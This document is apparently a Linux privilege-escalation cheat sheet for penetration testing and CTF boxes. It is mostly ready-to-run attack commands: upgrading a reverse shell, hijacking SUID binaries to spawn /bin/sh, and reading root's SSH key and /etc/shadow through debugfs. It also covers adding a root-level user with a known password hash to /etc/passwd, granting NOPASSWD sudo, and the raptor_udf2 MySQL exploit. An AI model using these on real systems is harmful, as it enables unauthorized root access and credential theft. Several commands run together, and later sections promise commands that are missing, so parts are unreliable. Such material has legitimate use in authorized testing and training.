python -c 'import pty; pty.spawn("/bin/bash")'
Ctrl-Z
# In Kali Note the number of rows and cols in the current terminal window
$ stty -a
# Next we will enable raw echo so we can use TAB autocompletes
$ stty raw -echo
$ fg
# In reverse shell
$ stty rows <num> columns <cols>
# Finally
$ reset
$ export SHELL=bash
$ export TERM=xterm-256color
Start with the basics
Who am i and what groups do I belong to? id
Who else is on this box (lateral movement)? ls -la /home cat /etc/passwd
What Kernel version and distro are we working with here? uname -a cat /etc/issue
What new processes are running on the server (Thanks to IPPSEC for the script!):
#!/bin/bash
# Loop by line
IFS=$'\n'
old_process=$(ps aux --forest | grep -v "ps aux --forest" | grep -v "sleep 1" | grep -v $0)
while true; do
new_process=$(ps aux --forest | grep -v "ps aux --forest" | grep -v "sleep 1" | grep -v $0)
diff <(echo "$old_process") <(echo "$new_process") | grep [\<\>]
sleep 1
old_process=$new_process
done
Who can execute code as root (probably will get a permission denied)? cat /etc/sudoers
Can I execute code as root (you will need the user's password)? sudo -l
What executables have SUID bit that can be executed as another user? find / -type f -user root -perm /u+s -ls 2>/dev/null find / -user root -perm -4000 -print 2>/dev/null find / -perm -u=s -type f 2>/dev/null find / -user root -perm -4000 -exec ls -ldb {} \;
Do any of the SUID binaries run commands that are vulnerable to file path manipulation? strings /usr/local/bin/binaryelf mail echo "/bin/sh" > /tmp/mailcd /tmp export PATH=. /usr/local/bin/binaryelf
Do any of the SUID binaries run commands that are vulnerable to Bash Function Manipulation?
strings /usr/bin/binaryelf mailfunction /usr/bin/mail() { /bin/sh; } export -f /usr/bin/mail /usr/bin/binaryelf
Can I write files into a folder containing a SUID bit file?
Might be possible to take advantage of a '.' in the PATH or an The IFS (or Internal Field Separator) Exploit.
If any of the following commands appear on the list of SUID or SUDO commands, they can be used for privledge escalation:
SUID / SUDO Executables
Priv Esc Command (will need to prefix with sudo if you are using sudo for priv esc.
(ALL : ALL ) ALL
You can run any command as root. sudo su - sudo /bin/bash
Note: You can find an incredible list of Linux binaries that can lead to privledge escalation at the GTFOBins project website here: https://gtfobins.github.io/
Can I access services that are running as root on the local network? netstat -antup ps -aux | grep root
Network Services Running as Root
Exploit actions
mysql
raptor_udf2 exploit 0xdeadbeef.info/exploits/raptor_udf2.c insert into foo values(load_file('/home/smeagol/raptor_udf2.so'));
apache
drop a reverse shell script on to the webserver
nfs
no_root_squash parameter Or if you create the same user name and matching user id as the remote share you can gain access to the files and write new files to the share
Are any of the discovered credentials being reused by multiple acccounts? sudo - username sudo -s
Are there any Cron Jobs Running? cat /etc/crontab
What files have been modified most recently? find /etc -type f -printf '%TY-%Tm-%Td %TT %p\n' | sort -r find /home -type f -mmin -60 find / -type f -mtime -2
Is the user a member of the Disk group and can we read the contents of the file system? debugfs /dev/sda debugfs: cat /root/.ssh/id_rsa debugfs: cat /etc/shadow
Is the user a member of the Video group and can we read the Framebuffer? cat /dev/fb0 > /tmp/screen.raw cat /sys/class/graphics/fb0/virtual_size
Where can we WRITE?
What are all the files can I write to? find / -type f -writable -path /sys -prune -o -path /proc -prune -o -path /usr -prune -o -path /lib -prune -o -type d 2>/dev/null
What folder can I write to? find / -regextype posix-extended -regex "/(sys|srv|proc|usr|lib|var)" -prune -o -type d -writable 2>/dev/null
Writable Folder / file
Priv Esc Command
/home/USER/
Create an ssh key and copy it to the .ssh/authorized_keys folder the ssh into the account
/etc/passwd
manually add a user with a password of "password" using the following syntax user:$1$xtTrK/At$Ga7qELQGiIklZGDhc6T5J0:1000:1000:,,,:/home/user:/bin/bash You can even escalate to the root user in some cases with the following syntax: admin:$1$xtTrK/At$Ga7qELQGiIklZGDhc6T5J0:0:0:,,,:/root:/bin/bash
Root SSH Key If Root can login via SSH, then you might be able to find a method of adding a key to the /root/.ssh/authorized_keys file.
cat /etc/ssh/sshd_config | grep PermitRootLogin
Add SUDOers If we can write arbitrary files to the host as Root, it is possible to add users to the SUDO-ers group like so (NOTE: you will need to logout and login again as myuser):
/etc/sudoers
root ALL=(ALL:ALL) ALL
%sudo ALL=(ALL:ALL) ALL
myuser ALL=(ALL) NOPASSWD:ALL
Set Root Password We can also change the root password on the host if we can write to any file as root:
/etc/shadow
It is always a great idea to automate the enumeration process once you understand what you are looking for.
LinEmum.sh
LinEnum is a handy method of automating Linux enumeration. It is also written as a shell script and does not require any other intpreters (Python,PERL etc.) which allows you to run it file-lessly in memory.
First we need to git a copy to our local Kali linux machine:
And the enumeration script should run on the remote machine.
CTF Machine Tactics
Often it is easy to identify when a machine was created by the date / time of file edits.
We can create a list of all the files with a modify time in that timeframe with the following command:
请发表评论